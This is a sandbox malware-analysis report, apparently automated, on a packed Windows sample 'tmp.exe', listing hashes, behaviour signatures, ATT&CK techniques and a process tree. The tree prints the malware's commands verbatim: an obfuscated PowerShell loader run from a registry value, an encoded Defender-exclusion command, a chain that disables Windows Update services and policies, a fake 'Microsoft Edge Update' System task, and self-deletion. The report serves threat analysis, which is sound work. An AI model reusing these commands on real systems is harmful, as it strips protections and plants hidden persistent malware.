Analysis

  • max time kernel
    151s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    19-01-2023 04:56

General

  • Target

    tmp.exe

  • Size

    4.9MB

  • MD5

    e2c876ff5b1f24b59d928e595234cdef

  • SHA1

    82d06b09b2a8c514929aab293242d4796d4ee39f

  • SHA256

    e0622827883ae65735b2d662eb26e75aa70e1d90d5d37991a566a4ab9ff99244

  • SHA512

    9562c0eb5485578c25f741beb5cb8206b2b4c7037e9a3bfa553ff833280c6788f730808e6fa93c7100486cd7877a33adddf8225944779638d304d1a42c66d7fd

  • SSDEEP

    98304:ZXMmA6BgrvHq3uwG/9SopFAVrSkgAm2K2fklNvpJtpqCutXE:ZXb0TwmFzQ5PK2fklNvpJyCut

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry key 1 TTPs 9 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:476
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:460
        • C:\Windows\system32\taskhost.exe
          "taskhost.exe"
          2⤵
            PID:1192
          • C:\Windows\system32\sppsvc.exe
            C:\Windows\system32\sppsvc.exe
            2⤵
              PID:952
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
              2⤵
                PID:964
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                2⤵
                  PID:1036
                • C:\Windows\System32\spoolsv.exe
                  C:\Windows\System32\spoolsv.exe
                  2⤵
                    PID:360
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k NetworkService
                    2⤵
                      PID:296
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Drops file in Windows directory
                      • Suspicious use of UnmapMainImage
                      PID:860
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {AC443445-2A9A-4E28-96C1-829A1F55DCF7} S-1-5-18:NT AUTHORITY\System:Service:
                        3⤵
                          PID:1224
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1484
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:876
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService
                        2⤵
                          PID:836
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                          2⤵
                            PID:788
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                            2⤵
                              PID:720
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k RPCSS
                              2⤵
                                PID:656
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k DcomLaunch
                                2⤵
                                  PID:580
                              • C:\Windows\system32\winlogon.exe
                                winlogon.exe
                                1⤵
                                  PID:416
                                  • C:\Windows\System32\dllhost.exe
                                    C:\Windows\System32\dllhost.exe /Processid:{02b160d4-f3a1-44bd-a0ce-afabc6c86f8c}
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:684
                                  • C:\Windows\SysWOW64\dllhost.exe
                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{097bfcf0-27ac-41e4-a9f9-0417c67ba9c9}
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1684
                                • C:\Windows\system32\lsm.exe
                                  C:\Windows\system32\lsm.exe
                                  1⤵
                                    PID:484
                                  • \\?\C:\Windows\system32\wbem\WMIADAP.EXE
                                    wmiadap.exe /F /T /R
                                    1⤵
                                      PID:1956
                                    • C:\Windows\Explorer.EXE
                                      C:\Windows\Explorer.EXE
                                      1⤵
                                        PID:1324
                                        • C:\Users\Admin\AppData\Local\Temp\tmp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
                                          2⤵
                                          • Drops file in Drivers directory
                                          • Suspicious use of SetThreadContext
                                          • Drops file in Program Files directory
                                          • Modifies system certificate store
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:1952
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAagBiAG8AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBhAGMAdwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBoAGYAdwAjAD4A"
                                            3⤵
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1252
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                            3⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:428
                                            • C:\Windows\system32\sc.exe
                                              sc stop UsoSvc
                                              4⤵
                                              • Launches sc.exe
                                              PID:524
                                            • C:\Windows\system32\sc.exe
                                              sc stop WaaSMedicSvc
                                              4⤵
                                              • Launches sc.exe
                                              PID:1828
                                            • C:\Windows\system32\sc.exe
                                              sc stop wuauserv
                                              4⤵
                                              • Launches sc.exe
                                              PID:1060
                                            • C:\Windows\system32\sc.exe
                                              sc stop bits
                                              4⤵
                                              • Launches sc.exe
                                              PID:968
                                            • C:\Windows\system32\sc.exe
                                              sc stop dosvc
                                              4⤵
                                              • Launches sc.exe
                                              PID:1448
                                            • C:\Windows\system32\reg.exe
                                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                              4⤵
                                              • Modifies registry key
                                              PID:1904
                                            • C:\Windows\system32\reg.exe
                                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                              4⤵
                                              • Modifies registry key
                                              PID:896
                                            • C:\Windows\system32\reg.exe
                                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                              4⤵
                                              • Modifies security service
                                              • Modifies registry key
                                              PID:432
                                            • C:\Windows\system32\reg.exe
                                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                              4⤵
                                              • Modifies registry key
                                              PID:608
                                            • C:\Windows\system32\reg.exe
                                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                              4⤵
                                              • Modifies registry key
                                              PID:1404
                                            • C:\Windows\system32\takeown.exe
                                              takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1152
                                            • C:\Windows\system32\icacls.exe
                                              icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                              4⤵
                                              • Possible privilege escalation attempt
                                              • Modifies file permissions
                                              PID:564
                                            • C:\Windows\system32\reg.exe
                                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                              4⤵
                                              • Modifies registry key
                                              PID:1736
                                            • C:\Windows\system32\reg.exe
                                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                              4⤵
                                              • Modifies registry key
                                              PID:1204
                                            • C:\Windows\system32\reg.exe
                                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                              4⤵
                                              • Modifies registry key
                                              PID:1532
                                            • C:\Windows\system32\reg.exe
                                              reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                              4⤵
                                              • Modifies registry key
                                              PID:1116
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                              4⤵
                                                PID:1780
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                4⤵
                                                  PID:1744
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                  4⤵
                                                    PID:1568
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                    4⤵
                                                      PID:1660
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                      4⤵
                                                        PID:1768
                                                      • C:\Windows\system32\schtasks.exe
                                                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                        4⤵
                                                          PID:2032
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                          4⤵
                                                            PID:1684
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                          3⤵
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1296
                                                          • C:\Windows\system32\powercfg.exe
                                                            powercfg /x -hibernate-timeout-ac 0
                                                            4⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:528
                                                          • C:\Windows\system32\powercfg.exe
                                                            powercfg /x -hibernate-timeout-dc 0
                                                            4⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1056
                                                          • C:\Windows\system32\powercfg.exe
                                                            powercfg /x -standby-timeout-ac 0
                                                            4⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1524
                                                          • C:\Windows\system32\powercfg.exe
                                                            powercfg /x -standby-timeout-dc 0
                                                            4⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1496
                                                        • C:\Windows\System32\conhost.exe
                                                          C:\Windows\System32\conhost.exe
                                                          3⤵
                                                          • Drops file in Windows directory
                                                          PID:816
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
                                                          3⤵
                                                            PID:1560
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""
                                                              4⤵
                                                              • Creates scheduled task(s)
                                                              PID:616
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Microsoft Edge Update "
                                                            3⤵
                                                              PID:1904
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /run /tn "Microsoft Edge Update "
                                                                4⤵
                                                                  PID:548
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
                                                                3⤵
                                                                • Deletes itself
                                                                PID:1716
                                                                • C:\Windows\system32\choice.exe
                                                                  choice /C Y /N /D Y /T 3
                                                                  4⤵
                                                                    PID:1844
                                                            • C:\Windows\system32\Dwm.exe
                                                              "C:\Windows\system32\Dwm.exe"
                                                              1⤵
                                                                PID:1272
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "782886799-18752547461431446477-714199134-20677965201825209682-4285672631748500549"
                                                                1⤵
                                                                  PID:1180

                                                                Network

                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                Execution

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Persistence

                                                                Modify Existing Service

                                                                2
                                                                T1031

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Privilege Escalation

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Defense Evasion

                                                                Modify Registry

                                                                3
                                                                T1112

                                                                Impair Defenses

                                                                1
                                                                T1562

                                                                File Permissions Modification

                                                                1
                                                                T1222

                                                                Install Root Certificate

                                                                1
                                                                T1130

                                                                Discovery

                                                                System Information Discovery

                                                                1
                                                                T1082

                                                                Command and Control

                                                                Web Service

                                                                1
                                                                T1102

                                                                Impact

                                                                Service Stop

                                                                1
                                                                T1489

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Windows\Tasks\dialersvc32.job
                                                                  Filesize

                                                                  1KB

                                                                  MD5

                                                                  e058790b9c2fbeb743377f3d4f67df2d

                                                                  SHA1

                                                                  377b30fbd7ec2a448bf892cf47346c85ed9ad06c

                                                                  SHA256

                                                                  ccce469a64340e9bdb1bcd0cb8601fda82ac66a47b2662d27ab71214e97f6b3d

                                                                  SHA512

                                                                  1a19855cbcdc36679a57d57eff684667dae7c8a66d8f29dd6e496f910179e1cf9a558f1589dc8f8b0759e6987e7c4674ca8acb0f16a511466ebecb3ce7109ce0

                                                                • memory/296-238-0x0000000000CF0000-0x0000000000D1A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/296-239-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/360-240-0x0000000001C50000-0x0000000001C7A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/360-241-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/416-219-0x0000000000720000-0x0000000000743000-memory.dmp
                                                                  Filesize

                                                                  140KB

                                                                • memory/416-137-0x0000000000720000-0x0000000000743000-memory.dmp
                                                                  Filesize

                                                                  140KB

                                                                • memory/416-140-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/416-143-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/416-221-0x0000000000750000-0x000000000077A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/416-281-0x0000000000750000-0x000000000077A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/428-65-0x0000000000000000-mapping.dmp
                                                                • memory/432-77-0x0000000000000000-mapping.dmp
                                                                • memory/460-145-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/460-280-0x0000000000A30000-0x0000000000A5A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/460-146-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/460-226-0x0000000000A30000-0x0000000000A5A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/476-228-0x00000000000C0000-0x00000000000EA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/476-150-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/476-149-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/476-282-0x00000000000C0000-0x00000000000EA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/484-155-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/484-153-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/484-283-0x00000000002D0000-0x00000000002FA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/484-229-0x00000000002D0000-0x00000000002FA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/524-67-0x0000000000000000-mapping.dmp
                                                                • memory/528-69-0x0000000000000000-mapping.dmp
                                                                • memory/548-114-0x0000000000000000-mapping.dmp
                                                                • memory/564-82-0x0000000000000000-mapping.dmp
                                                                • memory/580-284-0x0000000000230000-0x000000000025A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/580-230-0x0000000000230000-0x000000000025A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/580-159-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/580-157-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/608-78-0x0000000000000000-mapping.dmp
                                                                • memory/616-112-0x0000000000000000-mapping.dmp
                                                                • memory/656-285-0x0000000000190000-0x00000000001BA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/656-163-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/656-231-0x0000000000190000-0x00000000001BA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/656-161-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/684-128-0x00000001400033F4-mapping.dmp
                                                                • memory/684-256-0x0000000000ED0000-0x0000000000EFA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/684-224-0x0000000076F90000-0x0000000077139000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/684-130-0x0000000140000000-0x0000000140042000-memory.dmp
                                                                  Filesize

                                                                  264KB

                                                                • memory/684-127-0x0000000140000000-0x0000000140042000-memory.dmp
                                                                  Filesize

                                                                  264KB

                                                                • memory/684-141-0x0000000140000000-0x0000000140042000-memory.dmp
                                                                  Filesize

                                                                  264KB

                                                                • memory/684-132-0x0000000076F90000-0x0000000077139000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/684-279-0x0000000076F90000-0x0000000077139000-memory.dmp
                                                                  Filesize

                                                                  1.7MB

                                                                • memory/684-134-0x0000000076E70000-0x0000000076F8F000-memory.dmp
                                                                  Filesize

                                                                  1.1MB

                                                                • memory/720-165-0x000007FEBE8F0000-0x000007FEBE900000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/720-286-0x00000000003A0000-0x00000000003CA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/720-232-0x00000000003A0000-0x00000000003CA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/720-167-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/788-288-0x00000000008F0000-0x000000000091A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/788-235-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/788-234-0x00000000008F0000-0x000000000091A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/816-100-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-105-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-101-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-102-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-109-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-98-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-96-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-95-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-117-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-107-0x0000000140001844-mapping.dmp
                                                                • memory/816-103-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/816-106-0x0000000140000000-0x0000000140056000-memory.dmp
                                                                  Filesize

                                                                  344KB

                                                                • memory/836-233-0x0000000000890000-0x00000000008BA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/836-287-0x0000000000890000-0x00000000008BA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/860-237-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/860-236-0x0000000000880000-0x00000000008AA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/876-270-0x0000000077170000-0x00000000772F0000-memory.dmp
                                                                  Filesize

                                                                  1.5MB

                                                                • memory/876-271-0x0000000003A00000-0x0000000003A05000-memory.dmp
                                                                  Filesize

                                                                  20KB

                                                                • memory/876-273-0x0000000003A80000-0x0000000003AA1000-memory.dmp
                                                                  Filesize

                                                                  132KB

                                                                • memory/876-269-0x0000000073BD0000-0x000000007417B000-memory.dmp
                                                                  Filesize

                                                                  5.7MB

                                                                • memory/876-218-0x0000000073BD0000-0x000000007417B000-memory.dmp
                                                                  Filesize

                                                                  5.7MB

                                                                • memory/876-119-0x0000000000000000-mapping.dmp
                                                                • memory/876-121-0x0000000075981000-0x0000000075983000-memory.dmp
                                                                  Filesize

                                                                  8KB

                                                                • memory/896-75-0x0000000000000000-mapping.dmp
                                                                • memory/952-249-0x00000000003D0000-0x00000000003FA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/952-250-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/964-246-0x00000000007A0000-0x00000000007CA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/968-71-0x0000000000000000-mapping.dmp
                                                                • memory/1036-242-0x00000000003A0000-0x00000000003CA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1056-73-0x0000000000000000-mapping.dmp
                                                                • memory/1060-70-0x0000000000000000-mapping.dmp
                                                                • memory/1116-86-0x0000000000000000-mapping.dmp
                                                                • memory/1152-81-0x0000000000000000-mapping.dmp
                                                                • memory/1180-275-0x00000000007A0000-0x00000000007CA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1180-255-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/1180-254-0x00000000007A0000-0x00000000007CA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1192-244-0x0000000001BF0000-0x0000000001C1A000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1192-245-0x0000000036FD0000-0x0000000036FE0000-memory.dmp
                                                                  Filesize

                                                                  64KB

                                                                • memory/1204-84-0x0000000000000000-mapping.dmp
                                                                • memory/1224-253-0x00000000003C0000-0x00000000003EA000-memory.dmp
                                                                  Filesize

                                                                  168KB

                                                                • memory/1252-61-0x000007FEED580000-0x000007FEEDFA3000-memory.dmp
                                                                  Filesize

                                                                  10.1MB

